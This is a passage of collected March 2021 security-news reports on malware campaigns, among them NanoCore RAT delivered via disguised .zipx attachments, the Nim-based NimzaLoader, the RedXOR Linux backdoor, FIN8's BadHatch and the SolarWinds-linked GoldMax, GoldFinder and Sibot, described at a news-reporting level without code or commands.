and energy saving limits on Mac computers, but malware developers kept an eye on
those innovations and quickly adapted their executables to Apple Silicon by
porting the code to the ARM64 architecture.
We have observed various attempts to port executables not just among typical adware such as Pirrit or Bnodlero samples, but also among malicious packages, such as the Silver Sparrow threat and XCSSET downloadable malicious modules. This certainly will give a kickstart to other malware adversaries to begin adapting their code for running on Apple M1 chips.
Malspam campaign uses icon files to delivers NanoCore RAT
13.3.2021
Virus
Securityaffairs
Researchers at Trustwave spotted a new malspam campaign that is abusing icon
files to trick victims into installing the NanoCore Trojan.
Researchers at
Trustwave have spoted a new malspam campaign that is abusing icon files to trick
victims into executing the NanoCore remote access Trojan.
The emails use a .zipx file attachment, a .zipx file is a ZIP archive compressed using the most recent compression methods of the WinZip archiver to provide optimal results.
The messages claim to be from a “Purchase Manager” of organizations that are being spoofed by attackers, they use an attachment named “NEW PURCHASE ORDER.pdf*.zipx” which is actually an image binary file.
“The attachments, which have a filename format “NEW PURCHASE ORDER.pdf*.zipx”, are actually image (Icon) binary files, with attached extra data, which happens to be RAR. This file format abuse is similar to what we have seen previously.” reads the analysis published by Trustwave.
The binary files have attached extra data in a .RAR format.
The attackers are using an icon file to avoid any scanning email gateways.
A prerequisite for the success of this campaign is that the victim has installed an unzip tool that can extract the executable file inside the attachment. Upon clicking on the attachment, an executable file is extracted.
“Interestingly, 7Zip can also extract the content of the latest .zipx sample. 7Zip initially tries to open the files as a ZIP archive and fails, but afterward, 7Zip recognizes the .zipx files as Rar5 archives and can get their contents unpacked. Unlike in the previous blog, there is no need for the extension of the recent attachments to be renamed to something else other than .zipx or .zip just for their executables to be extracted using 7Zip.” states the report. “The executables we gathered have a similar name to that of the .zipx attachment, “NEW PURCHASE ORDER*.exe”. Also, the icon at the start of the .zipx files is actually the icon used on the EXE files within the archive.”
The analysis of the EXE files employed in the campaign revealed that the threat actors attempted to install the NanoCore RAT version 1.2.2.0 on the victims’ systems. Nanocore RAT is a “general purpose” malware with specific client factories available to everyone and easily accessible. The RAT implements information stealer and keylogger capabilities, it also allows to deliver of additional payloads on the victim’s system.
The Nanocore RAT creates copies of itself in the AppData folder and is able to inject its malicious code at RegSvcs.exe process.
“The recent malspams have the same goal like the ones we investigated almost two years ago and that is to effectively hide the malicious executable from anti-malware and email scanners by abusing the file format of the “.zipx” attachment, which in this case is an Icon file with added surprises.” concludes the report.
Experts also published Indicators of Compromise (IoCs) for the threat.
Researchers Spotted Malware Written in Nim Programming Language
13.3.2021
Virus
Thehackernews
Cybersecurity researchers have unwrapped an "interesting email campaign" undertaken by a threat actor that has taken to distributing a new malware written in Nim programming language.
Dubbed "NimzaLoader" by Proofpoint researchers, the development marks one of the rare instances of Nim malware discovered in the threat landscape.
"Malware developers may choose to use a rare programming language to avoid detection, as reverse engineers may not be familiar with Nim's implementation, or focused on developing detection for it, and therefore tools and sandboxes may struggle to analyze samples of it," the researchers said.
Proofpoint is tracking the operators of the campaign under the moniker "TA800," who, they say, started distributing NimzaLoader starting February 3, 2021. Prior to the latest raft of activity, TA800 is known to have predominantly used BazaLoader since April 2020.
While APT28 has been previously linked to delivering Zebrocy malware using
Nim-based loaders, the appearance of NimzaLoader is yet another sign that
malicious actors are constantly retooling their malware arsenal to avoid
detection.
Proofpoint's findings have also been independently corroborated by researchers from Walmart's threat intelligence team, who named the malware "Nimar Loader."
Like with the case of BazaLoader, the campaign spotted on February 3 made use of personalized email phishing lures containing a link to a supposed PDF document that redirected the recipient to a NimzaLoader executable hosted on Slack, which used a fake Adobe icon as part of its social engineering tricks.
Once opened, the malware is designed to provide the attackers with access to the victim's Windows systems, alongside capabilities to execute arbitrary commands retrieved from a command-and-control server — including executing PowerShell commands, injecting shellcode into running processes, and even deploy additional malware.
Additional evidence gathered by Proofpoint and Walmart show that NimzaLoader is also being used to download and execute Cobalt Strike as its secondary payload, suggesting that threat actors integrate different tactics into their campaigns.
"It is [...] unclear if Nimzaloader is just a blip on the radar for TA800 — and the wider threat landscape — or if Nimzaloader will be adopted by other threat actors in the same way BazaLaoder has gained wide adoption," the researchers concluded.
Linux Systems Under Attack By New RedXOR Malware
12.3.2021 Virus Threatpost
Researchers say the new RedXOR backdoor is targeting Linux systems with various data exfiltration and network traffic tunneling capabilities.
Researchers have discovered a new backdoor targeting Linux systems, which they link back to the Winnti threat group.
The backdoor is called RedXOR – in part because its network data-encoding scheme is based on the XOR encryption algorithm, and in part because its samples were found on an old release of the Red Hat Enterprise Linux platform. The latter fact provides a clue that RedXOR is utilized in targeted attacks against legacy Linux systems, noted researchers.
The malware has various malicious capabilities, said researchers – from exfiltrating data to tunneling network traffic to another destination.
“The initial compromise in this campaign is not known but some common entry points to Linux environments are: Use of compromised credentials or by exploiting a vulnerability or misconfiguration,” Avigayil Mechtinger, security researcher with Intezer, told Threatpost. “It is also possible the initial compromise was via a different endpoint, meaning the threat actor laterally moved to a Linux machine where this malware was deployed.”
The samples were detected after being uploaded to VirusTotal from two different sources in Indonesia and Taiwan. Researchers told Threatpost that based on this, it is likely that at least two entities have discovered the malware in their environment.
RedXOR Malware: Cybersecurity Threat
After execution, RedXOR creates a hidden
folder (called “.po1kitd.thumb”) inside a home folder, which is then utilized to
store files related to the malware. Then, it creates a hidden file
(“.po1kitd-2a4D53”) inside this folder. The malware then installs a binary to
the hidden folder (called “.po1kitd-update-k”), and sets up persistence via
“init” scripts.
“The malware stores the configuration encrypted within the binary,” said researchers, in a Wednesday analysis. “In addition to the command-and-control (C2) IP address and port, it can also be configured to use a proxy. The configuration includes a password… This password is used by the malware to authenticate to the C2 server.”
After establishing this configuration, the malware then communicates with the C2 server over a TCP socket, and can execute various different commands (via a command code). These commands include: uploading, removing or opening files, executing shell commands, tunneling network traffic and writing content to files.
Chinese Threat Actor Connection
Researchers said they found “key
similarities” between RedXOR and other previously reported malware that is
associated with Winnti: the PWNLNX backdoor, the XOR.DDOS botnet and the
Groundhog botnet. The Winnti threat group (a.k.a. APT41, Barium, Wicked Panda or
Wicked Spider) is known for nation-state-backed cyber-espionage activity as well
as financial cybercrime.
These similarities include the use of open-source kernel rootkits (used for hiding their processes); the function name CheckLKM being used; network encoding with XOR; and various similarities in the main functions flow.
Also, “the overall code flow, behavior and capabilities of RedXOR are very similar to PWNLNX,” said researchers. “Both have file uploading and downloading functionalities together with a running shell. The network-tunneling functionality in both families is called ‘PortMap.'”
Malware Authors Eye Linux Systems
Researchers said that 2020 saw a 40-percent
increase in new Linux malware families – a new record at 56 malware strains.
Beyond Winnti, threat actors like APT28, APT29 and Carbanak are developing Linux
versions of their traditional malware, they said.
“Linux systems are under constant attack given that Linux runs on most of the public cloud workload,” said Intezer researchers. “A survey conducted by Sophos found that 70 percent of organizations using the public cloud to host data or workloads experienced a security incident in the past year.”
NanoCore RAT Scurries Past Email Defenses with .ZIPX Tactic
12.3.2021
Virus
Threatpost
A spam campaign hides a malicious executable behind file archive extensions.
A spate of malicious emails with attachments delivering the NanoCore remote access trojan (RAT) is evading anti-malware and email scanners by abusing the .ZIPX file format.
That’s according to researchers at Trustwave, who found that the campaign is effectively hiding a malicious executable by giving it a .ZIPX file extension, which is used to denote that a .ZIP archive format is compressed using the WinZip archiver. In reality, the appended file is an Icon image file wrapped inside a .RAR package. .RAR is a proprietary archive file format that supports data compression, error recovery and file spanning.
“The emails, claiming to be from the purchase manager of certain organizations that the cybercriminals are spoofing, look like usual [malicious spam emails] except for their attachment,” according to a Trustwave blog, published on Thursday. “The attachments, which have a filename format ‘NEW PURCHASE ORDER.pdf*.zipx,’ are actually image (Icon) binary files, with attached extra data, which happens to be .RAR.”
The victim’s machine needs to have an unzip tool that can extract the executable file inside the attachment. Enclosing the executable into a .RAR archive instead of a .ZIP file makes this more likely; it means that the file can be extracted by the popular archiving tool 7Zip, as well as WinRAR, Trustwave noted. 7Zip recognizes the .ZIPX files as Rar5 archives and can thus unpack its contents.
WinZip however does not support unzipping of the file.
“The NanoCore malware could be installed onto the system, if the user decides to run and extract it,” the researchers explained. “It all works because various archive utilities try their darndest to find something to unzip within files. You might even argue they try too hard.”
The malware more specifically is NanoCore version 1.2.2.0. When executed, it creates copies of itself at the AppData folder and injects its malicious code at RegSvcs.exe process, according to the analysis. From there, it sets about stealing data from the victim’s machine, including clipboard data, keystrokes, documents and files. NanoCore is also a modular trojan that can be modified to include additional plugins, expanding its functionality and performance based on the user’s needs.
Previous campaigns, including one in 2019 that delivered the Lokibot malware, have made use of the .ZIPX tactic, researchers said.
“The recently reported phishing campaign that spreads the NanoCore trojan is a variation on an old theme,” Saryu Nayyar, CEO at Gurucul, said via email. “It relies on a bit of social engineering, using a plausible hook, to coax a target into opening an infected file. In this case, the attackers are trying to use file formats and naming conventions to keep the target’s anti-malware software from detecting the trojan. However, it still relies on the user falling for the ruse.”
FIN8 Resurfaces with Revamped Backdoor Malware
12.3.2021
Virus
Threatpost
The financial cyber-gang is running limited attacks ahead of broader offensives on point-of-sale systems.
The FIN8 cyberattack group has resurfaced after a period of relative quiet, researchers have found. The gang is using new versions of the BadHatch backdoor to compromise companies in the chemical insurance, retail and technology industries.
The attacks have been seen hitting organizations around the world, mainly in Canada, Italy, Panama, Puerto Rico, South Africa and the United States, according to an analysis from Bitdefender this week.
FIN8 is a financially motivated threat group whose typical mode of attack has been to steal payment-card data from point-of-sale (PoS) environments, particularly those of retailers, restaurants and the hotel industry. The group has been active since at least 2016, but its activity is characterized by periods of dormancy.
In this case, the last time FIN8 hit targets was mid-2019, according to Bogdan Botezatu, director of threat research at Bitdefender.
“They have been dormant for 18 months (they made big splashes in 2017 and 2019), although they have been running tests on small pools of targets,” he told Threatpost.
FIN8 Tests Waters with Limited Attacks
So far, Bitdefender has recently
identified specific attacks on seven targets during its monitoring of the
command-center infrastructure used in previous FIN8 attacks.
“While this may sound diminutive, FIN8 is known to get back in business with small tests on a limited pool of victims before they go broad,” Botezatu told Threatpost. “This is a mechanism to validate security on a small subset before moving attacks to production.”
There have been other observed pockets of limited testing in 2020, he added.
This pilot-program approach usually stems from group refining or adding to its weapons arsenal. And indeed, the latest wave of activity features a new version of the BadHatch backdoor.
Over the course of 2020 and this year, there have been three different “limited release” campaigns using revamped versions of BadHatch.
“The move from the legacy versions 2.12 to current version 2.14 started in mid-2020 (version 2.14 was deployed during Christmas 2020),” Botezatu said.
The Evolving BadHatch Malware
BadHatch is a custom FIN8 malware that was also
used in the 2019 attacks. It has now been souped up, with marked improvements in
persistence, encryption, information-gathering and the ability to perform
lateral movement, according to a Bitdefender analysis released on Wednesday.
The latest backdoor version (v. 2.14), for instance, abuses sslip.io – a service that provides free IP-to-domain mapping to make SSL certificate generation easier. BatchHatch is using the encryption to conceal PowerShell commands while in transit. While the service is legitimate and widely used, the malware abuses it in an attempt at evading detection, according to Botezatu.
“This prevents security and some monitoring solutions from identifying and blocking PowerShell scripts during delivery from the command-and-control server (C2),” he told Threatpost. “This is particularly important in achieving stealth and, to a larger degree, persistence.”
The malware has added to its snooping capabilities too, with the ability to learn more about the victim’s network by grabbing screenshots, for instance – this eventually better allows lateral movement within an organization’s environment.
“The lateral movement part is critical, as it targets POS networks,” explained Botezatu. “This is because the malware is usually delivered via malicious attachments. The target victim can be anyone on the network and the malware has to jump from one endpoint to another until it reaches the real targets on the network – POS devices.”
The latest BadHatch version also allows file downloads, which could pave the way for different kinds of attacks in the future, beyond harvesting credit-card data.
“BadHatch has always been correlated with POS attacks, but it has extended backdoor capabilities that let operators perform lateral movement and also has the ability to download additional payloads from specified locations,” Botezatu said. “These payloads can play multiple roles, depending on the attackers’ agenda.”
Like most persistent and skilled cybercrime actors, FIN8 operators are constantly refining their tools and tactics – but they do fall into predictable rhythms. The latest activity is an indication to expect wider attacks soon, according to the researcher.
“FIN8 are the apex predators of the financial fraud ecosystem,” Botezatu said. “They take long breaks to perfect their tools and invest significant resources in circumventing traditional security situations. They are extremely focused on ‘living off the land’ attacks and only start targeting victims after they have battle-tested their tools.”
RedXOR, a new powerful Linux backdoor in Winnti APT arsenal
12.3.2021
Virus
Securityaffairs
Intezer experts have spotted a new strain of Linux backdoor dubbed RedXOR that
is believed to be part of the arsenal of China-linked Winniti APT.
Researchers from Intezer have discovered a new sophisticated backdoor, tracked
as RedXOR, that targets Linux endpoints and servers. The malware was likely
developed by the China-linked cyber espionage group Winnti.
“We have discovered an undocumented backdoor targeting Linux systems, masqueraded as polkit daemon. We named it RedXOR for its network data encoding scheme based on XOR.” reads the analysis published by Intezer.
“RedXOR” masquerades as a polkit daemon, it presents many similarities with malware (PWNLNX backdoor and XOR.DDOS and Groundhog) employed in past cyber espionage campaigns attributed to the Winnti group.
polkit is an application-level toolkit for defining and handling the policy that
allows unprivileged processes to speak to privileged processes:
The malware
encodes its network data with an encoding scheme based on XOR, experts also
noticed that the samples they analyzed have been compiled with a legacy GCC
compiler on an old release of Red Hat Enterprise Linux, This circumstance
suggests that the malware was employed in targeted attacks against legacy Linux
systems.
Intezer researchers analyzed two samples of the malware that were uploaded from Indonesia and Taiwan on February 23 and 24.
RedXOR, like other Winnti malware, PWNLNX and XOR.DDOS, are unstripped 64-bit ELF file.(“po1kitd-update-k”).
Upon execution, the malware creates a hidden folder , called “.po1kitd.thumb”, where it stores its files then launches the installation of the system. RedXOR forks a child process allowing the parent process to exit to detach the process from the shell.
“The new child determines if it has been executed as the root user or as another user on the system. It does this to create a hidden folder, called “.po1kitd.thumb”, inside the user’s home folder which is used to store files related to the malware. The malware creates a hidden file called “.po1kitd-2a4D53” inside the folder.” continues the report. “The file is locked to the current running process essentially creating a mutex. If another instance of the malware is executed, it also tries to obtain the lock but ultimately fails. Upon this failure the process exits.”
The malware stores the configuration encrypted within the binary, it includes the Command and control (C2) IP address, port, a password to authenticate the malware to the C2, and settings to eventually work as a proxy. .
The malware uses the “doXor” function to decrypt the configuration values, the decryption logic is a simple XOR against a byte key.
The malware communicates with the C2 server over a TCP socket and the traffic is disguised as HTTP traffic.
RedXOR extracts “JSESSIONID”, “Content-Length”, “Total-Length” and the response body, where the JSESSIONID value holds the command ID for the job the C2 wants the malware to perform.
RedXOR supports multiple commands to implement multiple capabilities including
gathering system information (i.e. MAC address, username, distribution, clock
speed, kernel version, etc.), updating the malware, performing file operations,
providing operator with a “tty” shell, executing commands with system
privileges, and running arbitrary shell commands.
“Linux systems are under
constant attack given that Linux runs on most of the public cloud workload. A
survey conducted by Sophos found that 70% of organizations using the public
cloud to host data or workloads experienced a security incident in the past
year.” concludes the experts.
“Along with botnets and cryptominers, the Linux threat landscape is also home to sophisticated threats like RedXOR developed by nation-state actors.”
Nim-Based Malware Loader Spreads Via Spear-Phishing Emails
11.3.2021
Virus
Threatpost
Spear-phishing emails
are spreading the NimzaLoader malware loader, which some say may be used to
download Cobalt Strike.
The TA800 threat group is distributing a malware loader, which researchers call NimzaLoader, via ongoing, highly-targeted spear-phishing emails.
While previous Twitter analysis identified this loader as a mere variant of TA800’s existing BazaLoader malware, new research cites evidence that NimzaLoader is a disparate strain — with its own separate string-decryption methods and hashing algorithm techniques.
The malware loader is unique in that it is written in the Nim programming language. The use of Nim is uncommon for malware in the threat landscape, except in rare cases, such as a Nim-based downloader recently seen being used by the Zebrocy threat group. Because of this, researchers say malware developers may be using Nim to avoid detection by defense teams who may not be familiar with the language.
“Malware developers may choose to use a rare programming language to avoid detection, as reverse engineers may not be familiar with Nim’s implementation, or focused on developing detection for it, and therefore tools and sandboxes may struggle to analyze samples of it,” said Dennis Schwarz and Matthew Mesa, researchers with Proofpoint on Wednesday, in a report shared with Threatpost before publication.
NimzaLoader is used as “initial-access malware” and was first discovered being distributed by the TA800 threat actor in February, said researchers. TA800 is an affiliate distributor of TrickBot and BazaLoader (also known as the BazarBackdoor, BazarCall, etc.). The campaign was spotted targeting about 100 organizations across approximately 50 verticals, Proofpoint researchers told Threatpost.
It is unclear what NimzaLoader’s primary purpose is at this time – however, some evidence suggests the loader is being used to download and execute the Cobalt Strike commodity malware as its secondary payload, researchers said.
BazaLoader Versus NimzaLoader
Some initial analysis of NimzaLoader by various
researchers on Twitter has indicated that it may be a variant of BazaLoader,
another loader used by TA800 that has the primary function of downloading and
executing additional modules. But, researchers with Proofpoint pointed to
evidence that they say shows NimzaLoader is not merely a BazaLoader variant:
“Based on our observations of significant differences, we are tracking this as a
distinct malware family,” they said.
They cited several major differences between NimzaLoader and BazaLoader: For instance, the two samples use different code-flattening obfuscators, different styles of string decryption and different XOR/rotate-based Windows API hashing algorithms, they said. Other tactics that set NimzaLoader apart include the fact that the malware doesn’t use a domain-generation algorithm and that it makes use of JSON in its command-and-control (C2) communications.
The Email Spear-Phishing Campaign
Nim Loader
A sample spear-phishing
email. Click to enlarge. Credit: Proofpoint.
Researchers first observed the NimzaLoader campaign on Feb. 3, in the form of emails with “personalized details” for victims – including their names and company names.
The messages purport to come from a coworker, saying he is “late” driving into the office and asking the email recipient to check over a presentation. The message sends a URL link (which is shortened) that purports to be a link to a PDF preview.
If the email recipient clicks on the link, they are redirected to a landing page hosted on email marketing service GetResponse. That page links to the “PDF” and tells the victim to “save to preview.” This link in turn actually takes the victim to the NimzaLoader executable.
NimzaLoader Malware Executable
Upon closer inspection, researchers found
that NimzaLoader is developed using Nim (as evidenced by various “nim” related
strings in the executable). The malware uses mostly encrypted strings, using an
XOR-based algorithm and a single key per string. One encrypted string contains a
timestamp and is used to set an expiration date for the malware. For instance,
in one analyzed sample the expiration date was set to Feb. 10 at 1:20:55.003
p.m. – meaning the malware would not run after that date and time.
Most of the other strings contain command names. These commands include the ability to execute powershell.exe and inject a shellcode into a process as a thread. While the NimzaLoader C2 servers were down at the time of research, researchers said a public malware sandbox appeared to show the malware receiving a PowerShell command that ultimately delivered a Cobalt Strike beacon.
“We are unable to validate or confirm this finding, but it does align with past TA800 tactics, techniques and procedures (TTPs),” they said.
TA800 Threat Group: The Future of NimzaLoader
Researchers linked NimzaLoader
back to TA800, a threat group that has targeted a wide range of industries in
North America, infecting victims with banking trojans and malware loaders.
According to Proofpoint researchers, TA800’s previous campaigns have often included malicious emails with recipients’ names, titles and employers, along with phishing pages designed to look like the targeted company. Researchers noted that the malware shows TA800 continuing to integrate different tactics into their campaigns.
“It is… unclear if Nimzaloader is just a blip on the radar for TA800—and the wider threat landscape—or if Nimzaloader will be adopted by other threat actors in the same way BazaLaoder has gained wide adoption,” said researchers.
Researchers Unveil New Linux Malware Linked to Chinese Hackers
11.3.2021
Virus
Thehackernews
Cybersecurity researchers on Wednesday shed light on a new sophisticated backdoor targeting Linux endpoints and servers that's believed to be the work of Chinese nation-state actors.
Dubbed "RedXOR" by Intezer, the backdoor masquerades as a polkit daemon, with similarities found between the malware and those previously associated with the Winnti Umbrella (or Axiom) threat group such as PWNLNX, XOR.DDOS and Groundhog.
RedXOR's name comes from the fact that it encodes its network data with a scheme based on XOR, and that it's compiled with a legacy GCC compiler on an old release of Red Hat Enterprise Linux, suggesting that the malware is deployed in targeted attacks against legacy Linux systems.
Intezer said two samples of the malware were uploaded from Indonesia and Taiwan around Feb. 23-24, both countries that are known to be singled out by China-based threat groups.
Aside from the overlaps in terms of the overall flow and functionalities and the
use of XOR encoding between RedXOR and PWNLNX, the backdoor takes the form of
an unstripped 64-bit ELF file ("po1kitd-update-k"), complete with a typosquatted
name ("po1kitd" vs. "polkitd"), which, upon execution, proceeds to create a
hidden directory to store files related to the malware, before installing itself
on the machine.
Polkit (née PolicyKit) is a toolkit for defining and handling authorizations, and is used for allowing unprivileged processes to communicate with privileged processes.
Additionally, the malware comes with an encrypted configuration that houses the command-and-control (C2) IP address and port, and the password it needs to authenticate to the C2 server, before establishing connection over a TCP socket.
What's more, the communications are not only disguised as harmless HTTP traffic, but are also encoded both ways using an XOR encryption scheme, the results of which are decrypted to reveal the exact command to be run.
RedXOR supports a multitude of capabilities, including gathering system information (MAC address, username, distribution, clock speed, kernel version, etc.), performing file operations, executing commands with system privileges, running arbitrary shell commands, and even options to remotely update the malware.
Users victimized by RedXOR can take protective measures by killing the process and removing all files related to the malware.
If anything, the latest development points to an increase in the number of active campaigns targeting Linux systems, in part due to widespread adoption of the operating system for IoT devices, web servers, and cloud servers, leading attackers to port their existing Windows tools to Linux or develop new tools that support both platforms.
"Some of the most prominent nation-state actors are incorporating offensive Linux capabilities into their arsenal and it's expected that both the number and sophistication of such attacks will increase over time," Intezer researchers outlined in a 2020 report charting the last decade of Linux APT attacks.
FIN8 Hackers Return With More Powerful Version of BADHATCH PoS Malware
11.3.2021
Virus
Thehackernews
Threat actors known
for keeping a low profile do so by ceasing operations for prolonged periods in
between to evade attracting any attention as well as constantly refining their
toolsets to fly below the radar of many detection technologies.
One such group is FIN8, a financially motivated threat actor that's back in action after a year-and-a-half hiatus with a powerful version of a backdoor with upgraded capabilities including screen capturing, proxy tunneling, credential theft, and fileless execution.
First documented in 2016 by FireEye, FIN8 is known for its attacks against the retail, hospitality, and entertainment industries while making use of a wide array of techniques such as spear-phishing and malicious tools like PUNCHTRACK and BADHATCH to steal payment card data from point-of-sale (POS) systems.
"The FIN8 group is known for taking long breaks to improve TTPs and increase their rate of success," Bitdefender researchers said in a report published today. "The BADHATCH malware is a mature, highly advanced backdoor that uses several evasion and defense techniques. The new backdoor also attempts to evade security monitoring by using TLS encryption to conceal Powershell commands."
BADHATCH, since its discovery in 2019, has been deployed as an implant capable
of running attacker-supplied commands retrieved from a remote server, in
addition to injecting malicious DLLs in a current process, gathering system
information, and exfiltrating data to the server.
Noting that at least three different variants of the backdoor (v2.12 to 2.14) have been spotted since April 2020, the researchers said the latest version of BADHATCH abuses a legitimate service called sslp.io to thwart detection during the deployment process, using it to download a PowerShell script, which in turn executes the shellcode containing the BADHATCH DLL.
The PowerShell script, besides taking responsibility for achieving persistence, also takes care of privilege escalation to ensure that all commands post the script's execution are run as the SYSTEM user.
Furthermore, a second evasion technique adopted by FIN8 involves passing off communications with the command-and-control (C2) server that masquerade as legitimate HTTP requests.
According to Bitdefender, the new wave of attacks is said to have taken place over the past year and directed against insurance, retail, technology, and chemical industries in the U.S., Canada, South Africa, Puerto Rico, Panama, and Italy.
"Like most persistent and skilled cyber-crime actors, FIN8 operators are constantly refining their tools and tactics to avoid detection," the researchers concluded, urging businesses to "separate the POS network from the ones used by employees or guests" and filter out emails containing malicious or suspicious attachments.
GoldMax, GoldFinder, and Sibot, 3 new malware used by SolarWinds attackers
6.3.2021
Virus
Securityaffairs
Microsoft experts continue to investigate the SolarWinds attack and spotted 3
new strains of malware used as second-stage payloads.
Microsoft announced the
discovery of three new pieces of malware that the threat actors behind the
SolarWinds attack, tracked by the IT giant as Nobelium, used as second-stage
payloads.
Microsoft’s initial investigation revealed the existence of the Sunburst backdoor and Teardrop malware, now the Microsoft Threat Intelligence Center (MSTIC) team and the Microsoft 365 Defender Research Team announced to have discovered three new malware strains tracked as GoldMax, Sibot, and GoldFinder.
“Microsoft discovered these new attacker tools and capabilities in some compromised customer networks and observed them to be in use from August to September 2020. Further analysis has revealed these may have been on compromised systems as early as June 2020. These tools are new pieces of malware that are unique to this actor.” reads the analysis published by Microsoft. “They are tailor-made for specific networks and are assessed to be introduced after the actor has gained access through compromised credentials or the SolarWinds binary and after moving laterally with TEARDROP and other hands-on-keyboard actions.”
These three pieces of malware were by the threat actors to maintain persistence and perform malicious actions in very targeted attacks.
The tailor-made malware were used as second-stage payloads, the attack vectors were compromised credentials, the SolarWinds binary, lateral movements conducted with the TEARDROP malware, or in some cases manually deployed.
The first malware, dubbed GoldMax, is a Go-based malware used as a command-and-control backdoor by the attackers. The malware used a scheduled task impersonating systems management software as a persistence trick. GoldMax implements a decoy network traffic generator to hide network traffic and avoid detection.
The second malware, dubbed Sibot, is a dual-purpose malicious code written in VBScript used by the threat actors to gain persistence and to download and execute a payload from a remote C2 server.
The third malware is a malware written in Go, dubbed GoldFinder, likely used as a custom HTTP tracer tool that logs the route or hops that a packet takes to reach a hardcoded C2 server.
Microsoft provided details about the malware and the alerts provided by its security solution when detecting behavior associated with a wide range of attacks, including the NOBELIUM’s activity.
This week, malware researchers at FireEye discovered a new sophisticated second-stage backdoor, dubbed Sunshuttle, while analyzing the servers of an organization that was compromised as a result of the SolarWinds supply-chain attack.
“In all stages of the attack, the actor demonstrated a deep knowledge of software tools, deployments, security software and systems common in networks, and techniques frequently used by incident response teams.” states Microsoft.
Three New Malware Strains Linked to SolarWinds Hackers
6.3.2021
Virus
Securityweek
Microsoft and cybersecurity firm FireEye on Thursday published blog posts detailing several new pieces of malware that they believe are linked to the hackers behind the supply chain attack targeting Texas-based IT management solutions provider SolarWinds.
Microsoft has started tracking the threat actor behind the SolarWinds attack as NOBELIUM. The company has identified three new pieces of malware that it believes are used by the group after they have compromised the targeted organization’s network. The malware, named GoldMax, GoldFinder and Sibot, has been used to maintain persistence and for other “very specific” actions.
GoldMax, a malware developed in Go and designed to act as a command and control backdoor, persists by creating a scheduled task that impersonates system management software. The malware allows its operators to download and execute files on the compromised device, upload files to the C&C server, execute OS commands, spawn a command shell, and update the malware’s configuration data.
GoldMax uses various techniques to hide its activities and evade detection. It can step into action as soon as it reaches a system, or it can be configured to initiate malicious activities only at a date and time specified in its configuration file.
The blog post published by FireEye also details this piece of malware, which the company tracks as SUNSHUTTLE. FireEye said the sample analyzed by its researchers was uploaded to a public malware repository in August 2020 by a US-based entity.
FireEye described SUNSHUTTLE as a second-stage backdoor and said it had seen the malware on the systems of an organization targeted by the SolarWinds hackers, which it tracks as UNC2452. However, while the company has found evidence that the malware is linked to UNC2452, it could not fully verify the connection.
Another new NOBELIUM-linked malware discovered by Microsoft is Sibot, which the tech giant described as a dual-purpose malware written in VBScript. Sibot helps the attackers achieve persistence on the compromised computer and allows them to download and execute another payload from a remote server.
The third piece of malware linked by Microsoft to the SolarWinds hackers is named GoldFinder and it has been described as a “custom HTTP tracer tool that logs the route or hops that a packet takes to reach a hardcoded C2 server.” GoldFinder can find the HTTP proxy servers, network security devices and other systems that a request travels through before reaching the C&C server.
SolarWinds has been targeted by at least two threat groups. One of them, which has been linked to Russia, was behind the supply chain attack that involved hacking into SolarWinds’ networks and the delivery of malware to thousands of its customers. This is the threat group that is believed to have used the malware described this week by Microsoft and FireEye.
Microsoft believes as many as 1,000 hackers were involved in this attack, but many experts have expressed doubt regarding those claims.
SolarWinds was also targeted by an unrelated threat actor believed to be operating out of China, which did not compromise its systems and instead launched attacks involving the exploitation of a zero-day vulnerability in a SolarWinds product after they gained access to the targeted organization’s systems.
Managed Services Provider CompuCom Hit by Malware
6.3.2021
Virus
Securityweek
Managed services provider CompuCom was recently targeted in a cyberattack that led to some disruption to customer services and internal operations.
In a statement issued on Wednesday, the MSP said some of its IT systems became infected with a piece of malware, which impacted the services provided to certain customers.
Its investigation is ongoing, but CompuCom said there had been no indication that customers’ systems were “directly impacted by the incident.”
“As soon as we became aware of the situation, we immediately took steps to contain it, and engaged leading cybersecurity experts to begin an investigation. We are also communicating with customers to provide updates about the situation and the actions we are taking,” the company stated.
It added, “We are in the process of restoring customer services and internal operations as quickly and safely as possible.”
CompuCom has not shared any technical information about the incident, but BleepingComputer reported learning that the company was targeted in a ransomware attack.
CompuCom is a wholly owned subsidiary of The ODP Corporation, the company behind OfficeMax and Office Depot. It provides workplace and staff services and technology solutions to companies of all sizes.
Researchers Find 3 New Malware Strains Used by SolarWinds Hackers
6.3.2021
Virus
Thehackernews
FireEye and Microsoft on Thursday said they discovered three more malware strains in connection with the SolarWinds supply-chain attack, including a "sophisticated second-stage backdoor," as the investigation into the sprawling espionage campaign continues to yield fresh clues about the threat actor's tactics and techniques.
Dubbed GoldMax (aka SUNSHUTTLE), GoldFinder, and Sibot, the new set of malware adds to a growing list of malicious tools such as Sunspot, Sunburst (or Solorigate), Teardrop, and Raindrop that were stealthily delivered to enterprise networks by alleged Russian operatives.
"These tools are new pieces of malware that are unique to this actor," Microsoft said. "They are tailor-made for specific networks and are assessed to be introduced after the actor has gained access through compromised credentials or the SolarWinds binary and after moving laterally with Teardrop and other hands-on-keyboard actions."
Microsoft also took the opportunity to name the actor behind the attacks against SolarWinds as NOBELIUM, which is also being tracked under different monikers by the cybersecurity community, including UNC2452 (FireEye), SolarStorm (Palo Alto Unit 42), StellarParticle (CrowdStrike), and Dark Halo (Volexity).
While Sunspot was deployed into the build environment to inject the Sunburst
backdoor into SolarWinds's Orion network monitoring platform, Teardrop and
Raindrop have been primarily used as post-exploitation tools to laterally move
across the network and deliver the Cobalt Strike Beacon.
Spotted between August to September 2020, SUNSHUTTLE is a Golang-based malware that acts as a command-and-control backdoor, establishing a secure connection with an attacker-controlled server to receive commands to download and execute files, upload files from the system to the server, and execute operating system commands on the compromised machine.
For its part, FireEye said it observed the malware at a victim compromised by UNC2452, but added it hasn't been able to fully verify the backdoor's connection to the threat actor. The company also stated it discovered SUNSHUTTLE in August 2020 after it was uploaded to a public malware repository by an unnamed U.S.-based entity.
One of the most notable features of GoldMax is the ability to cloak its malicious network traffic with seemingly benign traffic by pseudo-randomly selecting referrers from a list of popular website URLs (such as www.bing.com, www.yahoo.com, www.facebook.com, www.twitter.com, and www.google.com) for decoy HTTP GET requests pointing to C2 domains.
"The new SUNSHUTTLE backdoor is a sophisticated second-stage backdoor that demonstrates straightforward but elegant detection evasion techniques via its 'blend-in' traffic capabilities for C2 communications," FireEye detailed. "SUNSHUTTLE would function as a second-stage backdoor in such a compromise for conducting network reconnaissance alongside other Sunburst-related tools."
GoldFinder, also written in Go, is an HTTP tracer tool for logging the route a packet takes to reach a C2 server. In contrast, Sibot is a dual-purpose malware implemented in VBScript that's designed to achieve persistence on infected machines before downloading and executing a payload from the C2 server. Microsoft said it observed three obfuscated variants of Sibot.
